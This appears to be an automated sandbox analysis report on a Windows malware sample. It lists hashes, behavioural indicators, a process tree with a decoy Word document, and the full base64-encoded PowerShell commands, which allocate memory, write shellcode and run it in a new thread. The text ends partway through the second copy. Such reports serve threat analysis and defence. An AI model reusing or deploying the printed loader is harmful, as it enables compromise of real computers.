092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c

Analysis

max time kernel
152s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
30-05-2022 19:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe
Size

960KB
MD5

9c7dba56e25b6fddf1cba95c66f05e60
SHA1

080c0983e931f8d577b0eb7886719737e6a9363c
SHA256

092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c
SHA512

23fc37f30bd52f5b73595b0c856b6fafb88e57dbe8a9e584199a27c245af5688c92f4448199928a4487875dd08066bd481f0670331418dabc5983c763a2f7fdb

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

47 4404 powershell.exe
47 4404 powershell.exe
47 4404 powershell.exe
47 4404 powershell.exe

flow	pid	process
47	4404	powershell.exe
47	4404	powershell.exe
47	4404	powershell.exe
47	4404	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe

Drops file in System32 directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{E0149C22-5493-4252-8717-9A81CFEC5696}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{2188741D-99F4-4E6D-99FF-8F95ECD6D99F}.catalogItem	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exeWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exeWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4492 WINWORD.EXE
4492 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4552 powershell.exe
4552 powershell.exe
708 powershell.exe
708 powershell.exe
4404 powershell.exe
4404 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4552 powershell.exe
Token: SeDebugPrivilege 708 powershell.exe
Token: SeDebugPrivilege 4404 powershell.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXE

pid process

4492 WINWORD.EXE
4492 WINWORD.EXE
4492 WINWORD.EXE
4492 WINWORD.EXE
4492 WINWORD.EXE
4492 WINWORD.EXE
4492 WINWORD.EXE
4492 WINWORD.EXE
4492 WINWORD.EXE

pid	process
4492	WINWORD.EXE
4492	WINWORD.EXE

pid	process
4552	powershell.exe
4552	powershell.exe
708	powershell.exe
708	powershell.exe
4404	powershell.exe
4404	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	708	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe

pid	process
4492	WINWORD.EXE
4492	WINWORD.EXE
4492	WINWORD.EXE
4492	WINWORD.EXE
4492	WINWORD.EXE
4492	WINWORD.EXE
4492	WINWORD.EXE
4492	WINWORD.EXE
4492	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.execmd.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 432 wrote to memory of 4492	432	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	WINWORD.EXE
PID 432 wrote to memory of 4492	432	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	WINWORD.EXE
PID 432 wrote to memory of 4548	432	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	cmd.exe
PID 432 wrote to memory of 4548	432	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	cmd.exe
PID 432 wrote to memory of 4548	432	092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe	cmd.exe
PID 4548 wrote to memory of 4552	4548	cmd.exe	powershell.exe
PID 4548 wrote to memory of 4552	4548	cmd.exe	powershell.exe
PID 4548 wrote to memory of 4552	4548	cmd.exe	powershell.exe
PID 4552 wrote to memory of 708	4552	powershell.exe	powershell.exe
PID 4552 wrote to memory of 708	4552	powershell.exe	powershell.exe
PID 4552 wrote to memory of 708	4552	powershell.exe	powershell.exe
PID 708 wrote to memory of 4404	708	powershell.exe	powershell.exe
PID 708 wrote to memory of 4404	708	powershell.exe	powershell.exe
PID 708 wrote to memory of 4404	708	powershell.exe	powershell.exe
PID 4404 wrote to memory of 4772	4404	powershell.exe	csc.exe
PID 4404 wrote to memory of 4772	4404	powershell.exe	csc.exe
PID 4404 wrote to memory of 4772	4404	powershell.exe	csc.exe
PID 4772 wrote to memory of 3212	4772	csc.exe	cvtres.exe
PID 4772 wrote to memory of 3212	4772	csc.exe	cvtres.exe
PID 4772 wrote to memory of 3212	4772	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe
"C:\Users\Admin\AppData\Local\Temp\092baaca12d939476ad1f9ec3f4dbac7c4802b262c0cf5916a62419a8e752f8c.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:432

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\kasp.docx" /o ""
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\word.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lh -;sv p ec;sv qKC ((gv lh).value.toString()+(gv p).value.toString());powershell (gv qKC).value.toString() 'JABUAFQATQAgAD0AIAAnACQAdwBEAFgAeQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AEQAWAB5ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADEALAAwAHgAYgBhACwAMAB4ADQAZQAsADAAeABlADMALAAwAHgAZQA2ACwAMAB4ADgAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADUAYQAsADAAeAAwADEALAAwAHgAMQAzACwAMAB4ADcANQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4AGQAYwAsADAAeAA4ADYALAAwAHgANABhACwAMAB4ADIAOAAsADAAeAA1ADQALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGUANwAsADAAeAAyAGIALAAwAHgANQA4ACwAMAB4ADQAMAAsADAAeABhADUALAAwAHgAYwA3ACwAMAB4ADEAMwAsADAAeAAwADQALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA1ADEALAAwAHgAOAAxACwAMAB4ADUAMQAsADAAeABkADUALAAwAHgAZABjACwAMAB4AGYANwAsADAAeAA1AGMALAAwAHgAZQA2ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgAZgBmACwAMAB4ADYANAAsADAAeAA4AGMALAAwAHgAMQA4ACwAMAB4ADIAMAAsADAAeAA1ADUALAAwAHgANQBmACwAMAB4ADYAZAAsADAAeAAyADEALAAwAHgAOQAyACwAMAB4ADgAMgAsADAAeAA5AGMALAAwAHgANwAzACwAMAB4ADQAYgAsADAAeABjADgALAAwAHgAMwAzACwAMAB4ADYANAAsADAAeABmADgALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAAwAGYALAAwAHgAYgAyACwAMAB4ADAAOQAsADAAeAA4ADgALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAAyAGIALAAwAHgAYgA5ACwAMAB4AGEAMgAsADAAeAAxADkALAAwAHgANwAyACwAMAB4ADEAOQAsADAAeAA0ADQALAAwAHgAYwBlACwAMAB4ADAAZQAsADAAeAAxADAALAAwAHgANQBlACwAMAB4ADEAMwAsADAAeAAyAGEALAAwAHgAZQBhACwAMAB4AGQANQAsADAAeABlADcALAAwAHgAYwAwACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgAMwA2ACwAMAB4ADIAOAAsADAAeAA0ADEALAAwAHgANwBlACwAMAB4AGYANwAsADAAeABkAGIALAAwAHgAOQBiACwAMAB4ADQANgAsADAAeAAzAGYALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeABiAGUALAAwAHgAMwBjACwAMAB4AGIAOQAsADAAeABlADkALAAwAHgAMAA0ACwAMAB4ADMAZgAsADAAeAA2ADUALAAwAHgANwBmACwAMAB4ADkAZgAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADIANwAsADAAeAA3AGIALAAwAHgAMQA2ACwAMAB4ADIAMgAsADAAeABiADEALAAwAHgAMAA4ACwAMAB4ADEANAAsADAAeAA4AGYALAAwAHgAYgA1ACwAMAB4ADUANwAsADAAeAAzADgALAAwAHgAMABlACwAMAB4ADEAOQAsADAAeABlAGMALAAwAHgANAA0ACwAMAB4ADkAYgAsADAAeAA5AGMALAAwAHgAMgAzACwAMAB4AGMAZAAsADAAeABkAGYALAAwAHgAYgBhACwAMAB4AGUANwAsADAAeAA5ADYALAAwAHgAOAA0ACwAMAB4AGEAMwAsADAAeABiAGUALAAwAHgANwAyACwAMAB4ADYAYQAsADAAeABkAGIALAAwAHgAYQAxACwAMAB4AGQAZAAsADAAeABkADMALAAwAHgANwA5ACwAMAB4AGEAOQAsADAAeABmADMALAAwAHgAMAAwACwAMAB4AGYAMAAsADAAeABmADAALAAwAHgAOQBiACwAMAB4AGUANQAsADAAeAAzADkALAAwAHgAMABiACwAMAB4ADUAYgAsADAAeAA2ADIALAAwAHgANAA5ACwAMAB4ADcAOAAsADAAeAA2ADkALAAwAHgAMgBkACwAMAB4AGUAMQAsADAAeAAxADYALAAwAHgAYwAxACwAMAB4AGEANgAsADAAeAAyAGYALAAwAHgAZQAwACwAMAB4ADIANgAsADAAeAA5AGQALAAwAHgAOAA4ACwAMAB4ADcAZQAsADAAeABkADkALAAwAHgAMQBlACwAMAB4AGUAOQAsADAAeAA1ADcALAAwAHgAMQBkACwAMAB4ADQAYQAsADAAeABiADkALAAwAHgAYwBmACwAMAB4AGIANAAsADAAeABmADMALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAAzADkALAAwAHgAMgA2ACwAMAB4AGMAZQAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4ADkAMgAsADAAeABhAGYALAAwAHgAOAA0ACwAMAB4ADEAYwAsADAAeAA0AGQALAAwAHgAYgAyACwAMAB4AGIAYQAsADAAeAA0AGYALAAwAHgAZAAxACwAMAB4ADMAYgAsADAAeAA1AGMALAAwAHgAMwBmACwAMAB4AGIAOQAsADAAeAA2AGIALAAwAHgAZgAxACwAMAB4AGYAZgAsADAAeAA2ADkALAAwAHgAYwBjACwAMAB4AGEAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGMAMwAsADAAeAA5AGUALAAwAHgAOAA3ACwAMAB4ADgAYgAsADAAeAAwADkALAAwAHgAYgA3ACwAMAB4ADIAZAAsADAAeAA2ADQALAAwAHgAZQA0ACwAMAB4AGUAZgAsADAAeABkADkALAAwAHgAMQBkACwAMAB4AGEAZAAsADAAeAA2ADQALAAwAHgANwA4ACwAMAB4AGUAMQAsADAAeAA3AGIALAAwAHgAMAAxACwAMAB4AGIAYQAsADAAeAA2ADkALAAwAHgAOAA4ACwAMAB4AGYANQAsADAAeAA3ADQALAAwAHgAOQBhACwAMAB4AGUANQAsADAAeABlADUALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeABiADAALAAwAHgANQA0ACwAMAB4AGEANgAsADAAeAA3ADUALAAwAHgANgBlACwAMAB4AGYAMgAsADAAeAA0ADYALAAwAHgAZQAwACwAMAB4ADkANQAsADAAeAA1ADUALAAwAHgAMQAxACwAMAB4ADkAYwAsADAAeAA5ADcALAAwAHgAOAAwACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANgA3ACwAMAB4AGUANwAsADAAeABlAGUALAAwAHgAOABhACwAMAB4AGYAZAAsADAAeAA0ADgALAAwAHgAOQA4ACwAMAB4AGYAMgAsADAAeAAxADEALAAwAHgANAA5ACwAMAB4ADUAOAAsADAAeABhADUALAAwAHgANwBiACwAMAB4ADQAOQAsADAAeAAzADAALAAwAHgAMQAxACwAMAB4AGQAOAAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADUAZQAsADAAeABmADUALAAwAHgAMABlACwAMAB4AGYANgAsADAAeABjAGIALAAwAHgAZgA2ACwAMAB4ADYANgAsADAAeABhAGIALAAwAHgANQBjACwAMAB4ADkAZgAsADAAeAA4ADQALAAwAHgAOQAyACwAMAB4AGEAYgAsADAAeAAwADAALAAwAHgANwA2ACwAMAB4AGYAMQAsADAAeAAyAGQALAAwAHgANwBjACwAMAB4AGEAMQAsADAAeAAzAGYALAAwAHgANQA4ACwAMAB4ADYAYwAsADAAeAA3ADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGUAVABiAGMAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGUAVABiAGMALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGUAVABiAGMALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAFQATQApACkAOwAkAHcAeAB2ACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGQARABTACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGQARABTACAAJAB3AHgAdgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAB3AHgAdgAgACQAZQAiADsAfQA='"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4552

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABUAFQATQAgAD0AIAAnACQAdwBEAFgAeQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB3AEQAWAB5ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADEALAAwAHgAYgBhACwAMAB4ADQAZQAsADAAeABlADMALAAwAHgAZQA2ACwAMAB4ADgAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAZQBlACwAMAB4AGYAYwAsADAAeAAzADEALAAwAHgANQA2ACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQA2ACwAMAB4ADUAYQAsADAAeAAwADEALAAwAHgAMQAzACwAMAB4ADcANQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4AGQAYwAsADAAeAA4ADYALAAwAHgANABhACwAMAB4ADIAOAAsADAAeAA1ADQALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGUANwAsADAAeAAyAGIALAAwAHgANQA4ACwAMAB4ADQAMAAsADAAeABhADUALAAwAHgAYwA3ACwAMAB4ADEAMwAsADAAeAAwADQALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA1ADEALAAwAHgAOAAxACwAMAB4ADUAMQAsADAAeABkADUALAAwAHgAZABjACwAMAB4AGYANwAsADAAeAA1AGMALAAwAHgAZQA2ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgAZgBmACwAMAB4ADYANAAsADAAeAA4AGMALAAwAHgAMQA4ACwAMAB4ADIAMAAsADAAeAA1ADUALAAwAHgANQBmACwAMAB4ADYAZAAsADAAeAAyADEALAAwAHgAOQAyACwAMAB4ADgAMgAsADAAeAA5AGMALAAwAHgANwAzACwAMAB4ADQAYgAsADAAeABjADgALAAwAHgAMwAzACwAMAB4ADYANAAsADAAeABmADgALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAAwAGYALAAwAHgAYgAyACwAMAB4ADAAOQAsADAAeAA4ADgALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAAyAGIALAAwAHgAYgA5ACwAMAB4AGEAMgAsADAAeAAxADkALAAwAHgANwAyACwAMAB4ADEAOQAsADAAeAA0ADQALAAwAHgAYwBlACwAMAB4ADAAZQAsADAAeAAxADAALAAwAHgANQBlACwAMAB4ADEAMwAsADAAeAAyAGEALAAwAHgAZQBhACwAMAB4AGQANQAsADAAeABlADcALAAwAHgAYwAwACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgAMwA2ACwAMAB4ADIAOAAsADAAeAA0ADEALAAwAHgANwBlACwAMAB4AGYANwAsADAAeABkAGIALAAwAHgAOQBiACwAMAB4ADQANgAsADAAeAAzAGYALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeABiAGUALAAwAHgAMwBjACwAMAB4AGIAOQAsADAAeABlADkALAAwAHgAMAA0ACwAMAB4ADMAZgAsADAAeAA2ADUALAAwAHgANwBmACwAMAB4ADkAZgAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADIANwAsADAAeAA3AGIALAAwAHgAMQA2ACwAMAB4ADIAMgAsADAAeABiADEALAAwAHgAMAA4ACwAMAB4ADEANAAsADAAeAA4AGYALAAwAHgAYgA1ACwAMAB4ADUANwAsADAAeAAzADgALAAwAHgAMABlACwAMAB4ADEAOQAsADAAeABlAGMALAAwAHgANAA0ACwAMAB4ADkAYgAsADAAeAA5AGMALAAwAHgAMgAzACwAMAB4AGMAZAAsADAAeABkAGYALAAwAHgAYgBhACwAMAB4AGUANwAsADAAeAA5ADYALAAwAHgAOAA0ACwAMAB4AGEAMwAsADAAeABiAGUALAAwAHgANwAyACwAMAB4ADYAYQAsADAAeABkAGIALAAwAHgAYQAxACwAMAB4AGQAZAAsADAAeABkADMALAAwAHgANwA5ACwAMAB4AGEAOQAsADAAeABmADMALAAwAHgAMAAwACwAMAB4AGYAMAAsADAAeABmADAALAAwAHgAOQBiACwAMAB4AGUANQAsADAAeAAzADkALAAwAHgAMABiACwAMAB4ADUAYgAsADAAeAA2ADIALAAwAHgANAA5ACwAMAB4ADcAOAAsADAAeAA2ADkALAAwAHgAMgBkACwAMAB4AGUAMQAsADAAeAAxADYALAAwAHgAYwAxACwAMAB4AGEANgAsADAAeAAyAGYALAAwAHgAZQAwACwAMAB4ADIANgAsADAAeAA5AGQALAAwAHgAOAA4ACwAMAB4ADcAZQAsADAAeABkADkALAAwAHgAMQBlACwAMAB4AGUAOQAsADAAeAA1ADcALAAwAHgAMQBkACwAMAB4ADQAYQAsADAAeABiADkALAAwAHgAYwBmACwAMAB4AGIANAAsADAAeABmADMALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAAzADkALAAwAHgAMgA2ACwAMAB4AGMAZQAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4ADkAMgAsADAAeABhAGYALAAwAHgAOAA0ACwAMAB4ADEAYwAsADAAeAA0AGQALAAwAHgAYgAyACwAMAB4AGIAYQAsADAAeAA0AGYALAAwAHgAZAAxACwAMAB4ADMAYgAsADAAeAA1AGMALAAwAHgAMwBmACwAMAB4AGIAOQAsADAAeAA2AGIALAAwAHgAZgAxACwAMAB4AGYAZgAsADAAeAA2ADkALAAwAHgAYwBjACwAMAB4AGEAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGMAMwAsADAAeAA5AGUALAAwAHgAOAA3ACwAMAB4ADgAYgAsADAAeAAwADkALAAwAHgAYgA3ACwAMAB4ADIAZAAsADAAeAA2ADQALAAwAHgAZQA0ACwAMAB4AGUAZgAsADAAeABkADkALAAwAHgAMQBkACwAMAB4AGEA